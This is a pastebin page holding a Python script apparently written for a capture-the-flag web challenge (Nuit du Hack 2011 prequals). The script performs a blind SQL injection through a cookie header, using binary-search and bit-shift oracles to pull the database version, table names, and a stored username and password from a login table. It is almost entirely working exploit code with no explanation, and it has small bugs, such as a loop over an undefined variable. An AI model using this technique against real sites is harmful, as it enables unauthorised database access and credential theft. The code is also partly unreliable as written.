Braindead's paster

Web300-NDHPrequals-SQLIScript

By buffer, 1 Year ago, written in Python.
URL http://paste.braindead.fr/index.php/view/99510748
Download Paste or View RawExpand paste to full width of browser | Change Viewing Options
  1. #!/usr/bin/python
  2.  
  3. # ----------------------------------------------------------------------------
  4. # "THE BEER-WARE LICENSE" (Revision 42):
  5. # <bufferoverfl0wz [at] gmail.com> wrote this file. As long as you retain this notice you
  6. # can do whatever you want with this stuff. If we meet some day, and you think
  7. # this stuff is worth it, you can buy me a beer in return -buffer-
  8. # ----------------------------------------------------------------------------
  9. #
  10. # buffer 2 Apr 2011
  11.  
  12.  
  13. import httplib, re, sys
  14.  
  15. def binary(_pass, _fail, function):
  16.    """
  17.   By using function(int c) that is an oracle saying that c
  18.   is lower or greater than expected ascii code, binary
  19.   finds this code using binary method
  20.   @param _pass known passing value
  21.   @param _fail known failing value
  22.   @param function oracle function
  23.   """
  24.    done = False;
  25.    rslt = -1;
  26.    c = (_pass+_fail)/2;
  27.    while( True ):
  28.       if( _fail - _pass < 5 ):
  29.          for c in range(_pass+1, _fail):
  30.             if( not function(c) ):
  31.                rslt = c;
  32.                done = True;
  33.                break;
  34.          # if we go there is that the latest fail is the good one...
  35.          if( not done ):
  36.             rslt = _fail;
  37.             done = True;
  38.       else:
  39.          if( function(c) ): #True
  40.             _pass = c
  41.          else: # False
  42.             _fail = c;
  43.          c = (_pass + _fail) / 2;
  44.       if( done ):
  45.          break;
  46.    return rslt;
  47.  
  48. def shr(function):
  49.    """
  50.   Using function(idx, val) as oracle saying if the idx-shifted value of
  51.   ascii code is equal to val, shr finds this code.
  52.   @param function oracle that says if idx-shifted value of ascii
  53.   code is equals to val
  54.   @return character
  55.   """
  56.    val = 0;
  57.    idxList = range(7);
  58.    idxList.reverse();
  59.    for idx in l:
  60.       if function(idx, val) != True:       # sql >> idx != val => sql >> idx = v
  61.          val += 1
  62.       if idx != 0:
  63.          val <<= 1;
  64.    return chr(val);
  65.  
  66.  
  67. class BlindSqlIt(object):
  68.    """
  69.   """
  70.    def __init__(self):
  71.       """
  72.      Ctor - can be modified to be more generic :s
  73.      """
  74.       pass
  75.  
  76.    def connect(self, webSite, page, headers={}):
  77.       """
  78.      Do an HTTP request and return the PASS/FAIL status of
  79.      the SQL Injection request
  80.      @param website fqdn of the website
  81.      @param page page to visit
  82.      @param headers dictionary of HTTP headers
  83.      @return PASS/FAIL status of the SQLi
  84.      """
  85.       conn = httplib.HTTPConnection(webSite);
  86.       conn.request("GET", page, headers=headers);
  87.       response = conn.getresponse();
  88.       if( response.status == 200 ):
  89.          raw_cookie = response.getheader('Set-Cookie');
  90.          return self.isMd5Pass(raw_cookie); # return TRUE or FALSE selon le md5
  91.       else:
  92.          print 'Connection failure';
  93.  
  94.    def isMd5Pass(self, raw_cookie):
  95.       """
  96.      Parse cookie to know if it is an ERROR message or not
  97.      @param raw_cookie raw cookie.
  98.      @return PASS/FAIL status of the SQLi
  99.      """
  100.       cookie_array = raw_cookie.split('=');
  101.       cookie = '';
  102.       if( len(cookie_array) == 2 ):
  103.          cookie = cookie_array[1];
  104.          print cookie
  105.       return cookie != 'cb5e100e5a9a3e7f6d1fd97512215282'
  106.  
  107.    def doRequest(self, request):
  108.       """
  109.      Pack the SQL request in the cookie header
  110.      @param request SQL request
  111.      @return PASS/FAIL status of the SQLi
  112.      """
  113.       headers = {'Cookie': 'PHPSESSID=g1d52vl3cd463mkmrsbisl59c3; cap=cb5e100e5a9a3e7f6d1fd97512215282' + request};
  114.       print headers;
  115.       return self.connect('ownm3.prequals.nuitduhack.com', '/captcha.php?id=0', headers=headers);
  116.    
  117.    def binaryRequest(self, sql, code):
  118.       """
  119.      Perform an SQL injection using binary method
  120.      @param sql sql request to inject
  121.      @param code integer value to compare result to
  122.      @return PASS/FAIL status of the SQLi
  123.      """
  124.       req = "' and %s>%i or '2'='" % (sql, code);
  125.       sys.stdout.write(req + '      ');
  126.       rslt = self.doRequest(req);
  127.       if( rslt ):
  128.          print 'PASS'
  129.       else:
  130.          print 'FAIL';
  131.       return rslt;
  132.  
  133.    def shrRequest(self, sql, bit, val):
  134.       """
  135.      Perform an SQL injection using shift right method
  136.      @param sql sql request to inject
  137.      @param bit numberof bits to shift
  138.      @param val integer value to compare to
  139.      @return PASS/FAIL status of the SQLi
  140.      """
  141.       req = "' and (%s>>%i)=%i or '2'='" % (sql, bit, val)
  142.       sys.stdout.write(req + '      ');
  143.       rslt = self.doRequest(req);
  144.       if( rslt ):
  145.          print 'PASS'
  146.       else:
  147.          print 'FAIL';
  148.       return rslt;
  149.  
  150.    def getParameterLength(self, parameterName):
  151.       """
  152.      Get a VARCHAR parameter length
  153.      @param parameterName name of the parameter (or SQL request) to get length of
  154.      @return length
  155.      """
  156.       sql = 'length(%s)' % (parameterName);
  157.       length = binary(-1, 64, lambda x: self.binaryRequest(sql, x));
  158.       print '===> len(%s) = %i <===' % (parameterName, length);
  159.       return length
  160.      
  161.    def getParameter(self, parameterName):
  162.       """
  163.      Get the result of a SQL injection
  164.      @param parameterName can be a varaible or a SQL request to get value of
  165.      @return value of sql request
  166.      """
  167.       # First, guess length of parameter
  168.       length = self.getParameterLength(parameterName);
  169.       parameter = ['']*length
  170.       for i in range(0, length+1):
  171.          sql = 'ASCII(SUBSTRING(%s, %i, 1))' % (parameterName, i);
  172.          letter = shr(lambda x, y: self.shrRequest(sql, x, y));
  173.          print '===> %s[%i] = %s <===' % (parameterName, i, letter);
  174.          parameter[i-1] = letter;
  175.       return(''.join(parameter));
  176.  
  177. sqlit = BlindSqlIt();
  178. print sqlit.getParameter('@@version');
  179.  
  180. # Try to get the 4 first tables:
  181. for i in range(4):
  182.    tableName = sqlit.getParameter('(SELECT table_name from information_schema.tables where table_schema=DATABASE() limit 1,1)');
  183.    print 'table[%i]=%s' % (i, tableName);
  184.  
  185. print sqlit.getParameter('(SELECT user from login where id=1)');
  186. print sqlit.getParameter('(SELECT pass from login where id=1)');
  187.  
  188.  
  189.  
  190.  

Replies to Web300-NDHPrequals-SQLIScript

Title Name When
RE: Web300-NDHPrequals-SQLIScrip akfhegrbjz 9 Months ago.
RE: Web300-NDHPrequals-SQLIScrip keeookgeu 9 Months ago.
RE: Web300-NDHPrequals-SQLIScrip wehbophv 9 Months ago.
RE: Web300-NDHPrequals-SQLIScrip Dolly 9 Months ago.

Reply to "Web300-NDHPrequals-SQLIScript"

Here you can reply to the paste above

Create a snipurl

Make Private

Feeling clever? Set some advanced options.

Created by Ben McRedmond and Powered By Stikked